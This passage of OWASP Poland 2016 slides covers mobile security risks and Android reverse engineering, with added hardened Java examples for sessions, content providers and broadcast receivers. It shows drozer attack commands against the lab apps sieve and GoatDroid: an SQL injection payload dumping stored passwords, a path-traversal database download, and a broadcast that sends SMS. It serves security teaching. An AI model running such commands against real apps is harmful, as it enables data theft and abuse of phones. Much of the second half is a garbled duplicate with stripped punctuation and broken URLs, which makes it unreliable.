• Invalidate the session on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
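The four mitigations as one server-side session store, added here as an example (not code from the talk): tokens are 256 bits from a CSPRNG rather than anything derived from a device ID, they expire after an idle timeout, they are destroyed when they expire, and every token of a user is dropped when the authentication state changes. Names and the 30-minute timeout are my own choices; it runs on a plain JVM.

```java
import java.security.SecureRandom;
import java.time.Duration;
import java.time.Instant;
import java.util.Base64;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;

/** Server-side session store: unguessable tokens, idle expiry, explicit invalidation. Hypothetical names. */
public final class SessionStore {
    private static final SecureRandom RNG = new SecureRandom();
    private static final Base64.Encoder B64 = Base64.getUrlEncoder().withoutPadding();

    private static final class Session {
        final String userId;
        Instant lastSeen;
        Session(String userId, Instant now) { this.userId = userId; this.lastSeen = now; }
    }

    private final Map<String, Session> sessions = new ConcurrentHashMap<>();
    private final Duration idleTimeout;

    public SessionStore(Duration idleTimeout) { this.idleTimeout = idleTimeout; }

    /** 256 random bits from a CSPRNG; never the device ID, the username or a timestamp. */
    public String create(String userId, Instant now) {
        byte[] raw = new byte[32];
        RNG.nextBytes(raw);
        String token = B64.encodeToString(raw);
        sessions.put(token, new Session(userId, now));
        return token;
    }

    /** User bound to the token, or null if the token is unknown or idle longer than the timeout. */
    public String resolve(String token, Instant now) {
        Session s = sessions.get(token);
        if (s == null) return null;
        if (Duration.between(s.lastSeen, now).compareTo(idleTimeout) > 0) {
            sessions.remove(token);   // expired: destroy it instead of leaving a dead token around
            return null;
        }
        s.lastSeen = now;
        return s.userId;
    }

    /** Logout, password change or privilege change: drop every token the user holds. */
    public int invalidateUser(String userId) {
        int before = sessions.size();
        sessions.values().removeIf(s -> s.userId.equals(userId));
        return before - sessions.size();
    }

    /** Authentication-state change (e.g. switching user): the old token must stop working. */
    public String rotate(String oldToken, String newUserId, Instant now) {
        sessions.remove(oldToken);
        return create(newUserId, now);
    }

    public static void main(String[] args) {
        SessionStore store = new SessionStore(Duration.ofMinutes(30));
        Instant t0 = Instant.parse("2016-02-24T18:00:00Z");   // constructed timeline
        String token = store.create("alice", t0);
        System.out.println(store.resolve(token, t0.plusSeconds(29 * 60)));   // still inside the idle window
        System.out.println(store.resolve(token, t0.plusSeconds(60 * 60)));   // 31 min idle: null, token destroyed
        String second = store.create("alice", t0);
        store.rotate(second, "alice", t0);
        System.out.println(store.resolve(second, t0));                        // rotated away: null
        String bob = store.create("bob", t0);
        System.out.println(store.invalidateUser("bob") + " token(s) dropped");
        System.out.println(store.resolve(bob, t0));                           // invalidated: null
    }
}
```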
Thank you
pawel.rzepa@outlook.com
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference/
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security/
• https://mobilesecuritywiki.com/
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest/
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step/
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an APK
Getting our APK file
• From the phone:
– APKOptic
– Astro File Manager
• Using ADB
• Use APKPure
Decompiling || Disassembling
• Decompiling – high level – Java code
• Disassembling – low level – assembly code
• Why disassembling and not decompiling?
Decompiling
DEX → JAR → JAVA
Decompiling - Dex2Jar
• dex2jar
– Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
– Allows using any existing Java decompiler with the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
– Closed-source Java decompiler
– Combined with dex2jar, you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → SMALI
Disassembling
• Apktool
– Open-source Java tool for reverse-engineering Android apps
– Transforms binary Dalvik bytecode (dex) into Smali source
Signing APK
• Using signapk.jar:
java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: Decompiling (Luyten)
Demo: Modify Smali Files
Demo
Intents
An intent is a defined object used for messaging that is created and communicated to an intended application component. It includes all relevant information about the calling application, the desired application component and the requested actions/data.
Intent intent = new Intent(Intent.ACTION_VIEW);
intent.setData(Uri.parse("http://www.google.com"));
String pack = "com.android.browser";
ComponentName comp = new ComponentName(pack, pack + ".BrowserActivity");
intent.setComponent(comp);
startActivity(intent);
Drozer
Open-source tool to interact with other applications through IPC - the leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer: you don't need to write your own apps to interact with other apps :)
dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://www.google.com --component com.android.browser com.android.browser.BrowserActivity
Drozer is installed in the default package of AppUse with adb, so it's enough to just "click-and-play"
Activity components
An Activity provides a screen with which users can interact in order to do something. Users can perform operations such as making a call, sending an SMS etc.
Example: the login screen of your Facebook app
Activities
Activity components attacks
• If an activity can be triggered by other apps (by an attacker), it can be abused
• By launching it with intents it's possible to achieve the following:
– modify data in the background
– trick the user
– leak sensitive information
• General hijacking scheme (diagram: components A, B and E)
• Results of an attack:
– a malicious Activity could read the data in the Intent and then immediately relay it to a legitimate one
– spoofing the expected Activity's user interface to steal user-supplied data (phishing)
• List and launch exported activities:
dz> run app.activity.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
  com.mwr.example.sieve.FileSelectActivity
  com.mwr.example.sieve.MainLoginActivity
  com.mwr.example.sieve.PWList
dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
Activity components demo
Services
A Service can perform long-running operations in the background and does not provide a user interface. Other components can bind to a Service, which lets the binder invoke methods that are declared in the target Service's interface. Intents are used to start and bind to Services.
Example: playing music or downloading a file
Services attacks
Although services generally don't seem dangerous, they could potentially perform sensitive operations.
To attack a service one needs interaction (it must be exported, or respond to/accept input from message formats like intents, files or the network stack).
Typical attacks: Denial of Service and Information Leakage
• Find exported services
• Launch them one by one with logcat to check for sensitive info
• Fire off intents and wait for it
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: using content providers, any app can read SMS from the built-in SMS app's repository on our device
• What info can they hold?
– user's phone numbers
– passwords
– SMS
• And one of the main problems is, again, permissions:
run app.provider.info --permission null
Content providers attacks
• Unrestricted access to the app database
– just query it: run app.provider.query content://settings/secure
• SQL injection
• Path traversal
Other attack vectors on auth might include altering data, e.g. by using the app.provider.insert command
dz> run scanner.provider.injection -a com.mwr.example.sieve
Content providers attacks
• Unrestricted access to the app database
dz> run scanner.provider.finduris -a com.mwr.example.sieve
Accessible content URIs:
  content://com.mwr.example.sieve.DBContentProvider/Keys/
  content://com.mwr.example.sieve.DBContentProvider/Passwords
  content://com.mwr.example.sieve.DBContentProvider/Passwords/
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
Content providers attacks
• SQL injection
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key--"
| Password         | pin  |
| thisismypassword | 9876 |
Content providers attacks
• Path traversal
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1  localhost
dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
Written 24576 bytes
Content providers demo
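What the provider side looks like once both sieve findings above (the injectable query and the traversable file path) are fixed, as an added example that is not the sieve app's source: the query goes through SQLiteQueryBuilder in strict mode with a column allow-list, and the file path is canonicalised and confined to one directory. Class, table and column names are hypothetical; the manifest should still set android:exported="false" or a permission on the provider.

```java
import android.content.ContentProvider;
import android.content.ContentValues;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteOpenHelper;
import android.database.sqlite.SQLiteQueryBuilder;
import android.net.Uri;
import android.os.ParcelFileDescriptor;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.util.HashMap;
import java.util.Map;

/**
 * Hardened read-only provider with the same two entry points the sieve
 * walkthrough abuses. Hypothetical class/table/column names; not sieve's code.
 * The code limits the damage even if the manifest export restriction is forgotten.
 */
public class HardenedBackupProvider extends ContentProvider {
    private static final String TABLE_PASSWORDS = "Passwords";
    private static final Map<String, String> PASSWORD_COLUMNS = new HashMap<>();
    static {
        // Allow-list of columns a caller may select; the secret column is deliberately absent.
        PASSWORD_COLUMNS.put("_id", "_id");
        PASSWORD_COLUMNS.put("service", "service");
        PASSWORD_COLUMNS.put("username", "username");
    }

    private SQLiteOpenHelper helper;
    private File backupDir;

    @Override
    public boolean onCreate() {
        helper = new SQLiteOpenHelper(getContext(), "database.db", null, 1) {
            @Override public void onCreate(SQLiteDatabase db) {
                db.execSQL("CREATE TABLE Passwords (_id INTEGER PRIMARY KEY, "
                        + "service TEXT, username TEXT, password TEXT)");
            }
            @Override public void onUpgrade(SQLiteDatabase db, int oldV, int newV) {}
        };
        backupDir = new File(getContext().getFilesDir(), "backup");   // the only directory served
        return true;
    }

    @Override
    public Cursor query(Uri uri, String[] projection, String selection,
                        String[] selectionArgs, String sortOrder) {
        SQLiteQueryBuilder qb = new SQLiteQueryBuilder();
        qb.setTables(TABLE_PASSWORDS);
        // A projection entry such as "* FROM Key--" is not a key of the map and is
        // rejected with IllegalArgumentException instead of being spliced into the SQL.
        qb.setProjectionMap(PASSWORD_COLUMNS);
        // Strict mode validates the selection as a stand-alone expression and wraps the
        // query in a sub-select, so a stray quote fails and other tables are unreachable.
        qb.setStrict(true);
        // Values belong in selectionArgs (bound parameters), never concatenated into selection.
        return qb.query(helper.getReadableDatabase(), projection, selection,
                selectionArgs, null, null, sortOrder);
    }

    @Override
    public ParcelFileDescriptor openFile(Uri uri, String mode) throws FileNotFoundException {
        if (!"r".equals(mode)) throw new FileNotFoundException("read-only provider");
        String path = uri.getPath();
        if (path == null) throw new FileNotFoundException("no path");
        try {
            // Canonicalise both sides so "..", symlinks and a leading "/" cannot escape backupDir;
            // a URI ending in /../../data/data/<pkg>/databases/database.db is rejected here.
            File root = backupDir.getCanonicalFile();
            File target = new File(backupDir, path).getCanonicalFile();
            if (!target.getPath().startsWith(root.getPath() + File.separator)) {
                throw new FileNotFoundException("path outside backup directory");
            }
            return ParcelFileDescriptor.open(target, ParcelFileDescriptor.MODE_READ_ONLY);
        } catch (IOException e) {
            throw new FileNotFoundException(e.getMessage());
        }
    }

    @Override public String getType(Uri uri) { return "vnd.android.cursor.dir/vnd.example.password"; }
    @Override public Uri insert(Uri uri, ContentValues v) { throw new UnsupportedOperationException("read-only"); }
    @Override public int delete(Uri uri, String sel, String[] args) { throw new UnsupportedOperationException("read-only"); }
    @Override public int update(Uri uri, ContentValues v, String sel, String[] args) { throw new UnsupportedOperationException("read-only"); }
}
```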
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as "Battery Low", "boot completed", "headset plug" etc. Though most broadcasts originate from the system, applications can also announce broadcasts.
• If a receiver accepts broadcasts from untrusted sources, the app is at risk
Broadcast receivers attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send intent and enjoy
Sample manifest from GoatDroid:
<receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
  <intent-filter>
    <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
  </intent-filter>
</receiver>
…
<uses-permission android:name="android.permission.SEND_SMS" />
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action:
public void onReceive(Context arg0, Intent arg1) {
    context = arg0;
    SmsManager sms = SmsManager.getDefault();
    Bundle bundle = arg1.getExtras();
    sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
    Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
}
run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for App Components
Applies to all the above-mentioned items:
• Setting the android:exported attribute to false (only the same user ID as the current app will be able to access the activity)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
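Both defenses applied to the GoatDroid receiver shown above, as an added example that is not GoatDroid's code: the receiver is registered as not exported and the sender must hold a signature-level permission, and even a delivered intent is validated before an SMS goes out, so the drozer broadcast above is neither delivered nor, if it were, acted on blindly. PERMISSION_SEND is a hypothetical permission name that the manifest would declare with android:protectionLevel="signature".

```java
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.os.Build;
import android.os.Bundle;
import android.telephony.SmsManager;
import java.util.regex.Pattern;

/**
 * Hardened counterpart of the GoatDroid SendSMSNowReceiver (example code, not
 * GoatDroid's own). Two layers: the receiver is not exported and the sender must
 * hold a signature-level permission; a delivered intent is still validated.
 */
public class SendSmsReceiver extends BroadcastReceiver {
    public static final String ACTION_SOCIAL_SMS = "org.owasp.goatdroid.fourgoats.SOCIAL_SMS";
    // Hypothetical custom permission; declared in the manifest with protectionLevel="signature",
    // so only apps signed with the same key as this one can send the broadcast.
    public static final String PERMISSION_SEND = "org.owasp.goatdroid.fourgoats.permission.SOCIAL_SMS";
    private static final Pattern PHONE_NUMBER = Pattern.compile("\\+?[0-9]{7,15}");
    private static final int MAX_MESSAGE_LEN = 160;

    @Override
    public void onReceive(Context context, Intent intent) {
        if (!ACTION_SOCIAL_SMS.equals(intent.getAction())) return;   // not the action we registered for
        Bundle extras = intent.getExtras();
        if (extras == null) return;                                   // the original would NPE here
        String number = extras.getString("phoneNumber");
        String message = extras.getString("message");
        if (number == null || message == null) return;
        if (!PHONE_NUMBER.matcher(number).matches() || message.length() > MAX_MESSAGE_LEN) return;
        SmsManager.getDefault().sendTextMessage(number, null, message, null, null);
    }

    /**
     * Runtime registration equivalent of android:exported="false" plus android:permission
     * on the manifest entry. Keep the returned receiver to unregister it later.
     * The flags overload needs compileSdk 33+; RECEIVER_NOT_EXPORTED exists from API 33.
     */
    public static SendSmsReceiver register(Context context) {
        SendSmsReceiver receiver = new SendSmsReceiver();
        IntentFilter filter = new IntentFilter(ACTION_SOCIAL_SMS);
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.TIRAMISU) {
            context.registerReceiver(receiver, filter, PERMISSION_SEND, null,
                    Context.RECEIVER_NOT_EXPORTED);
        } else {
            context.registerReceiver(receiver, filter, PERMISSION_SEND, null);
        }
        return receiver;
    }
}
```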
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components/
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage/
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers/
• http://yinzhicao.org/courses/f15/cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook/
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5/
• https://manifestsecurity.com/android-application-security-part-8/
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to provide you with basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in data stores on the device in an insecure (plain text or reversible encoding) format
Insecure data storage – what to look for
• Look for any sensitive information in:
– SQLite databases (local)
– XML data stores
– plain text configuration files
– cookie stores
– SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the sdcard before and after installing an application
• Analyze package files at different stages:
adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted and world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use the setStorageEncryption method)
• For databases consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or it does so incorrectly
What do you mean, "incorrectly"?
• Insecure implementations are:
– using known weak cipher versions (e.g. SSLv2/SSLv3, RC4)
– securing only part of the communication (e.g. only authentication)
– lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of a certificate is on the side of the browser
• It is done by a "chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• The expected X.509 certificate or public key is embedded in the source code:
if (presented_cert == pinned_cert)
    Start_connection()
else
    Drop_connection()
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked the developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid:
mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest/ for a public domain):
sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - a few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage talks about the developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakage
Unintended data leakage – common leakage points
• URL caching
• Copy/Paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB:
adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what is it
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user/see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise an operating system
• For example, a Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
